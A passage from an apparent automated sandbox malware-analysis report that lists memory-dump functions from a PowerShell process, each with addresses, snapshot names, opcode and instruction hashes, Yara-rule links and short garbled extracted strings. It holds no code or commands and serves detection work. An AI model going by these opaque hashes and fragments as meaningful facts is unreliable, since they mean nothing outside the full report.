                                                              • Opcode Fuzzy Hash: 5f762f652f32430e8d4ae65a4296e79204f86e55c7aae8ce0cdd9b1142f76e55
                                                              • Instruction Fuzzy Hash: E0B17C70E002098FDF18DFA8C89579EBBF2AF88314F14862DD855A7394FB74A845CB81
                                                              Function 0468F838 Relevance: .3, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 264a8d42c3500102891472da7614643e8e7f337580d874b6aeca3485cc5127a9
                                                              • Instruction ID: e515ee598c18e5f2783dfa3d2296695e287d65048579d3d17875b849c170028e
                                                              • Opcode Fuzzy Hash: 264a8d42c3500102891472da7614643e8e7f337580d874b6aeca3485cc5127a9
                                                              • Instruction Fuzzy Hash: 07B16B70E002099FDF18DFA9D99179DBBF2AF88314F14862DD815A7394FB74A885CB81
                                                              Function 07472D80 Relevance: 15.5, Strings: 12, Instructions: 524COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-745898724
                                                              • Opcode ID: b7228dcd9822b3c13c0783d1ca034900690285f7312d6edd207f391b9ac23c8c
                                                              • Instruction ID: b42dc7024b2977965943b143f534b75192c99f67f476bb7912eb7e67398203a2
                                                              • Opcode Fuzzy Hash: b7228dcd9822b3c13c0783d1ca034900690285f7312d6edd207f391b9ac23c8c
                                                              • Instruction Fuzzy Hash: D7F114B1704386DFCB258E68C8416EBBBB1EF86211F24C4ABD845CB391DB31D946D7A1
                                                              Function 074780E0 Relevance: 13.0, Strings: 10, Instructions: 501COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-4287419856
                                                              • Opcode ID: c6cbb9051ffaaa8babe6fd6a028621d70922991eb50104167b04df5ae35a41a4
                                                              • Instruction ID: 6ad9395e4bb8b6f0ea6d17f3342c22036e348a9627ebf936c8b6b3ad8f641d29
                                                              • Opcode Fuzzy Hash: c6cbb9051ffaaa8babe6fd6a028621d70922991eb50104167b04df5ae35a41a4
                                                              • Instruction Fuzzy Hash: 2CF159F07042169FCB218A7984192FBBBEAAFC5211F54C87BD905CB341DB31D946C7A1
                                                              Function 07471CD8 Relevance: 12.9, Strings: 10, Instructions: 422COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$tPdq$tPdq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-608414060
                                                              • Opcode ID: 1604276e0b620a0f570f96668eb683d0038569d762379d8809adccd6db53507f
                                                              • Instruction ID: 52cf300312daffc535a19ae1cef48bf3f20c83350cf136819e6d56149b87bc8f
                                                              • Opcode Fuzzy Hash: 1604276e0b620a0f570f96668eb683d0038569d762379d8809adccd6db53507f
                                                              • Instruction Fuzzy Hash: 5DE1D1B1B002199FCB249A69C8416EBBBB2FFC5311F14C46BDA199B341DB31D946CBA1
                                                              Function 07476586 Relevance: 10.7, Strings: 8, Instructions: 659COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$x.uk$-uk
                                                              • API String ID: 0-3427641133
                                                              • Opcode ID: 75c60e1eee390790d6255aca26d91727e8e878f76454d44e7760860ef17b1612
                                                              • Instruction ID: 2b7ca1eda2de24fe882fd61d57033ea22d7143b5f2c5a0127059a6088f585980
                                                              • Opcode Fuzzy Hash: 75c60e1eee390790d6255aca26d91727e8e878f76454d44e7760860ef17b1612
                                                              • Instruction Fuzzy Hash: 5042A2B4A00215DFDB24DB58C951BEEBBF2AF85301F51C89AD909AF744CB31AC46CB91
                                                              Function 07477B00 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$x.uk$-uk
                                                              • API String ID: 0-3427641133
                                                              • Opcode ID: cacfd2ed36b92cfbc009ccb7894a1956e72f682a46f51fafca74970f7f6311cb
                                                              • Instruction ID: f3d63ad6e17f8503dc6ee5a08ba9c13b4d55ce50ae11feb8ef445c1fcbade5cc
                                                              • Opcode Fuzzy Hash: cacfd2ed36b92cfbc009ccb7894a1956e72f682a46f51fafca74970f7f6311cb
                                                              • Instruction Fuzzy Hash: 8FD19EB0A002099FC715DB68C551BEEBBE3AB88305F61C82AD9056F795CF31EC46CB91
                                                              Function 074709F0 Relevance: 9.3, Strings: 7, Instructions: 502COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-2783870779
                                                              • Opcode ID: 7f2604beb047a4408a80d372cfd1bb8092e71c9c6a6fef9286accfe03e08e9d9
                                                              • Instruction ID: 927bd9176c08f0239fa4bcc7e8f9c1628c248563c0d56f3cb63f3f7aaaf3ddc7
                                                              • Opcode Fuzzy Hash: 7f2604beb047a4408a80d372cfd1bb8092e71c9c6a6fef9286accfe03e08e9d9
                                                              • Instruction Fuzzy Hash: D1F148B170631A9FC7258B6898416FBBBA2EFC5311F14C46BD805CB361DB31D946C7A1
                                                              Function 07476A33 Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$x.uk$x.uk$-uk
                                                              • API String ID: 0-2224374688
                                                              • Opcode ID: 7f6aae16d2debe9e5deb071e9c5e6605bf02a319a0e9f0d8913d10651791b798
                                                              • Instruction ID: 06708e8fe7305bb3a2411774c31020277169e8745430212b53a6f65fd1123d1b
                                                              • Opcode Fuzzy Hash: 7f6aae16d2debe9e5deb071e9c5e6605bf02a319a0e9f0d8913d10651791b798
                                                              • Instruction Fuzzy Hash: 63F1A1B0A002159FDB24DF58C951BAE7BF3AF84305F51C89AE9096F781CB35AC85CB91
                                                              Function 07477AF6 Relevance: 6.5, Strings: 5, Instructions: 260COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$x.uk$-uk
                                                              • API String ID: 0-241069083
                                                              • Opcode ID: 928215932646c4d056c770bd135b2420ef87fce8ff274a25373c76966f5962f4
                                                              • Instruction ID: ff5029be54ee3045004508eefc9e3212322a60f4aff83d402e55987b58066feb
                                                              • Opcode Fuzzy Hash: 928215932646c4d056c770bd135b2420ef87fce8ff274a25373c76966f5962f4
                                                              • Instruction Fuzzy Hash: FCA18EB0A00205DFD725CF68C541BEEBBB2AF88315F55C81AE9056F795CB31AC46CB91
                                                              Function 07479F90 Relevance: 5.6, Strings: 4, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq
                                                              • API String ID: 0-2296240322
                                                              • Opcode ID: 88e92ed55cd4e1ecfb9a5309be31594f6ab3330399aca57cf9da5975cb33f785
                                                              • Instruction ID: 94f7b564f04e12bfff1f7750b4b9a86009286aa26572e87149cdb5fb0981c281
                                                              • Opcode Fuzzy Hash: 88e92ed55cd4e1ecfb9a5309be31594f6ab3330399aca57cf9da5975cb33f785
                                                              • Instruction Fuzzy Hash: A91235B17042168FCB258E6C89017EF7BA2AFC2311F54C8ABD905DB791DB32D946C7A1
                                                              Function 07478760 Relevance: 4.0, Strings: 3, Instructions: 287COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$$dq
                                                              • API String ID: 0-3750620159
                                                              • Opcode ID: e50aa1e3f38396e093a508466267db3baa11da318908a37fb67f48cc84a099da
                                                              • Instruction ID: 64747748269f5e3f8da56d104905f853e2247ed2995cd8b15d0593280b6e8c5a
                                                              • Opcode Fuzzy Hash: e50aa1e3f38396e093a508466267db3baa11da318908a37fb67f48cc84a099da
                                                              • Instruction Fuzzy Hash: FF9128F07043169FCB258A7989197FB7BE6AFC6201F14886BD905CF391DA31D846C7A2
                                                              Function 0468F5A4 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V(k$\V(k
                                                              • API String ID: 0-634497353
                                                              • Opcode ID: fb663581695815079d8fb248e8b3f7c625ae62d7e8391fba1d418a74e27db0c1
                                                              • Instruction ID: 31c4e4a5b14990d9d6852896650c1d5f7ece58e21386b72488f8c5688ec9d0b2
                                                              • Opcode Fuzzy Hash: fb663581695815079d8fb248e8b3f7c625ae62d7e8391fba1d418a74e27db0c1
                                                              • Instruction Fuzzy Hash: 57717E70E002099FEB18DFA9D8807DEBBF1AF48714F14862DD415A7254EB74A886CF91
                                                              Function 0468F5B0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V(k$\V(k
                                                              • API String ID: 0-634497353
                                                              • Opcode ID: 570424a3e1fb428f41c88955134a6aba600a5fd88a3bdc10eda1e5191e950859
                                                              • Instruction ID: ce8eec74b7fb973775290bda8867ab30623aa2cf4de514efbd4640f71d04b17c
                                                              • Opcode Fuzzy Hash: 570424a3e1fb428f41c88955134a6aba600a5fd88a3bdc10eda1e5191e950859
                                                              • Instruction Fuzzy Hash: E5716F71E002099FEF18DFA9D8847DEBBF2AF48714F14862DD415A7354EB74A842CB91
                                                              Function 0468C404 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: h](k$I(k
                                                              • API String ID: 0-550193744
                                                              • Opcode ID: 66074a45b3a875ed34012b32dcf2e4e8c4c03c7473c69c3dfa6ba5a75a93c8a0
                                                              • Instruction ID: 033dad66336adb7d0e73def78fc7a2026260ba93b1fe4126df52769c5b177976
                                                              • Opcode Fuzzy Hash: 66074a45b3a875ed34012b32dcf2e4e8c4c03c7473c69c3dfa6ba5a75a93c8a0
                                                              • Instruction Fuzzy Hash: B4311C30B052188BCF2AAB34C8556AEB7F6AF89304F0405EDD50AAB351DF359E85CF91
                                                              Function 074709D0 Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $dq$$dq
                                                              • API String ID: 0-2340669324
                                                              • Opcode ID: 7f91aeb7972cf05936b692d2915435c252a6455430c13c849669f17f5202694d
                                                              • Instruction ID: 7d4205aaaef0365852df1ee8f2796ddd0fd7a04e4a135dde927c94a84a8a2c79
                                                              • Opcode Fuzzy Hash: 7f91aeb7972cf05936b692d2915435c252a6455430c13c849669f17f5202694d
                                                              • Instruction Fuzzy Hash: B51184B520A3879FD7228A24D8509E3BF75AF92210F2981ABD844CF2B3D631DD45C771
                                                              Function 0468EF5C Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V(k
                                                              • API String ID: 0-1335044990
                                                              • Opcode ID: 6be33d138a19295f42af639bcc5371933fcdeddf9de4974b65714b5c771cab00
                                                              • Instruction ID: 6f33eb276ccfa72d0015818a1071e6da208636ffde9682a4d325bbe606b026ad
                                                              • Opcode Fuzzy Hash: 6be33d138a19295f42af639bcc5371933fcdeddf9de4974b65714b5c771cab00
                                                              • Instruction Fuzzy Hash: 78B18C70E002098FDB18DFA8D8957DDBBF2AF88314F14862DE855A7394EB74A845CB81
                                                              Function 07475C58 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: x.uk
                                                              • API String ID: 0-892602854
                                                              • Opcode ID: 3dca31cab6eb2a68497f0e1780e1b59549fc01f083fb8e7fe87a8e900944e83e
                                                              • Instruction ID: 1a6ed4fcca3439640848dc43d6430227d257175575af05a8cbb137d133990a40
                                                              • Opcode Fuzzy Hash: 3dca31cab6eb2a68497f0e1780e1b59549fc01f083fb8e7fe87a8e900944e83e
                                                              • Instruction Fuzzy Hash: F09190B0B002049FD714DB58C655BEEBBE6AF89301F50C86AE9056F781CB32EC91CB91
                                                              Function 07475C30 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: x.uk
                                                              • API String ID: 0-892602854
                                                              • Opcode ID: 05080908cb13d438163fde94e3356186f7862bd2021006b7d3e0ece7014ee6bf
                                                              • Instruction ID: 89ce186d696050856f1ee45358d3b11846239dec9efc74124ed41fa10030e2a4
                                                              • Opcode Fuzzy Hash: 05080908cb13d438163fde94e3356186f7862bd2021006b7d3e0ece7014ee6bf
                                                              • Instruction Fuzzy Hash: CB91B0B4A00204AFD714DB54C650BEEBBF6AF89305F50C46AE505AF791CB32AC96CB91
                                                              Function 0747351C Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPdq
                                                              • API String ID: 0-2402691438
                                                              • Opcode ID: ed64ce27dddf1e9f673fac98b86e76741d4fa2b3b887c7b11adb0f83ed55f6f0
                                                              • Instruction ID: 8d22aca163dec2dcd373fa7874ad4314013a02d71f3455b247b679348343ea6f
                                                              • Opcode Fuzzy Hash: ed64ce27dddf1e9f673fac98b86e76741d4fa2b3b887c7b11adb0f83ed55f6f0
                                                              • Instruction Fuzzy Hash: EA61D2B46093D19FC7228F2488146E6BFB1AF86215B6AC4DBD4448F392C736DC46D7A2
                                                              Function 08284820 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PHdq
                                                              • API String ID: 0-2991842255
                                                              • Opcode ID: f01b979dfbaca8424f47a643da5367941f2508d5ee9d40802d5e7962b6e12c93
                                                              • Instruction ID: 3e39c3405d216e231a7a479254a8aabc88f8e1481b83f0319ee4f8160d70324a
                                                              • Opcode Fuzzy Hash: f01b979dfbaca8424f47a643da5367941f2508d5ee9d40802d5e7962b6e12c93
                                                              • Instruction Fuzzy Hash: C6719C70A2124ACFDF14EFE8C9547AEBBB2AF85305F204419D406AF394DB74AC89CB45
                                                              Function 07478744 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq
                                                              • API String ID: 0-1167855494
                                                              • Opcode ID: ca5469ff9fe0a4648cbe18c20d559017dfbc0b130e9f49f234c94e4f8c5cdb96
                                                              • Instruction ID: e38fbc9fc5e12e4fc09992267cce4c4f405a589af541cc5bf3965b275b2344ac
                                                              • Opcode Fuzzy Hash: ca5469ff9fe0a4648cbe18c20d559017dfbc0b130e9f49f234c94e4f8c5cdb96
                                                              • Instruction Fuzzy Hash: E241E7F0B00306DFDB248F658A487FA7BEAAF86200F5588ABD9019F791D731E945C752
                                                              Function 0828480F Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PHdq
                                                              • API String ID: 0-2991842255
                                                              • Opcode ID: 7d042067ebad3dd0e2f53cf3e0959e085860e613584aad2f01bf6e12f70e895b
                                                              • Instruction ID: be9d82d3245cca80ca14735af7e9d586aafee5b1c09f73ea827cc52d196b9f03
                                                              • Opcode Fuzzy Hash: 7d042067ebad3dd0e2f53cf3e0959e085860e613584aad2f01bf6e12f70e895b
                                                              • Instruction Fuzzy Hash: EE519C70A1034ACFDF24EFA4C94469EBBB2BF85305F248529D406AF394DB74AC45CB44
                                                              Function 07477F26 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: x.uk
                                                              • API String ID: 0-892602854
                                                              • Opcode ID: 862941bae6a40393acb18ffb255a1562527eace6445c813783fa2b77f4633768
                                                              • Instruction ID: 2d37b2eb7bf69916262f0c565029a0241a6f74f85f16b1a0924c1edff191ebc1
                                                              • Opcode Fuzzy Hash: 862941bae6a40393acb18ffb255a1562527eace6445c813783fa2b77f4633768
                                                              • Instruction Fuzzy Hash: FD31B3B0B40214EBD714AB68C955BEE7BE7AFC4305F50C825EA016F781CF76AC429B91
                                                              Function 082856E0 Relevance: .8, Instructions: 845COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a267d95208e735b0e47795fc7c0a4d7349322b3ab33b82c75f5e1b7e7e771b5f
                                                              • Instruction ID: 55e76ffd932d5aa07a33e19b42d17462dbc1ac1ba784ec88d04c25ac36c9caf6
                                                              • Opcode Fuzzy Hash: a267d95208e735b0e47795fc7c0a4d7349322b3ab33b82c75f5e1b7e7e771b5f
                                                              • Instruction Fuzzy Hash: AA721A74A11219DFCF05DF98D584AAEBBB2FF49311F248159E805AB3A5C731ED81CB90
                                                              Function 07475130 Relevance: .7, Instructions: 741COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 330c35ff241055402afe3e846f7132a2050010756f3e5ebdaee525696aca1964
                                                              • Instruction ID: 1489c1c960b8563c24da5d5cf9025eeb6d2fa31cb61c027415b89c27594423ba
                                                              • Opcode Fuzzy Hash: 330c35ff241055402afe3e846f7132a2050010756f3e5ebdaee525696aca1964
                                                              • Instruction Fuzzy Hash: F3626BB4A00214CFCB14DB98C941AEAFBF2AF84305F55C86AD9099F395CB31EC56CB91
                                                              Function 07475110 Relevance: .6, Instructions: 557COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 97177c14b0b5c31800f7fc63ec198c82265d1e1be8f3ab8883b1031ecd5a7970
                                                              • Instruction ID: c488d8e2cf30e1611d505e7e1d1c93bf1f679b25058e2387f76df7d89b400c6e
                                                              • Opcode Fuzzy Hash: 97177c14b0b5c31800f7fc63ec198c82265d1e1be8f3ab8883b1031ecd5a7970
                                                              • Instruction Fuzzy Hash: E0326CB4A00215CFDB10CB58C541AEAFBB2EF85714F55C4AAE9099F395C732EC56CB80
                                                              Function 074758A5 Relevance: .5, Instructions: 483COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dcfbccb6a0ecd0f81321d40c38a3472d2bfcc0142fd43c1f4b51ab89f5931fb1
                                                              • Instruction ID: 75d4ffe883bc1e2aa9818c079340cd77912b08acfc58cd72a701bd32d719e443
                                                              • Opcode Fuzzy Hash: dcfbccb6a0ecd0f81321d40c38a3472d2bfcc0142fd43c1f4b51ab89f5931fb1
                                                              • Instruction Fuzzy Hash: DF125BB4A00205DFDB20DB98C541AEAFBB2EF84714F55C46AE9099F395C732EC56CB80
                                                              Function 082807A0 Relevance: .3, Instructions: 338COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5b0e22f6bb2cdb460b8ca3e4d2ac6dc2390802cbb4ce114315c96ef3a1628731
                                                              • Instruction ID: 3d3473dde64aedf208d13e2bfb82a39743b9e21e465eb69f459439f138e40c9d
                                                              • Opcode Fuzzy Hash: 5b0e22f6bb2cdb460b8ca3e4d2ac6dc2390802cbb4ce114315c96ef3a1628731
                                                              • Instruction Fuzzy Hash: 90E10774A11619DFDB05DF98C484A9EBBB2FF88311F248159E849AB391C731ED85CB90
                                                              Function 04684A88 Relevance: .3, Instructions: 323COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fc8510e30f81512b8384c37c3c630ac1949a7b3c12d14e39b1259c3bdca7b4f
                                                              • Instruction ID: 1ec2c859d4adae7e365eea8f6a6ae691bbaa0f718919a119a61f7e20451656e3
                                                              • Opcode Fuzzy Hash: 7fc8510e30f81512b8384c37c3c630ac1949a7b3c12d14e39b1259c3bdca7b4f
                                                              • Instruction Fuzzy Hash: FBD10B74A002199FDB14DF98D584A9DFBF2FF88310F248659E804AB351EB75ED81CB90
                                                              Function 0468F82E Relevance: .3, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ce663773b2d3f7fdbfc7272188142d494afc69ddbdaebd195033f1fd670cb45
                                                              • Instruction ID: a4747fed3b0783fc554391add210703fdc90fc80a9f8022c91e379761e33a452
                                                              • Opcode Fuzzy Hash: 5ce663773b2d3f7fdbfc7272188142d494afc69ddbdaebd195033f1fd670cb45
                                                              • Instruction Fuzzy Hash: 29B15C70E00209DFDF18DFA9D98179DBBF1AF98314F14862DD815AB394EB74A846CB81
                                                              Function 04689378 Relevance: .3, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
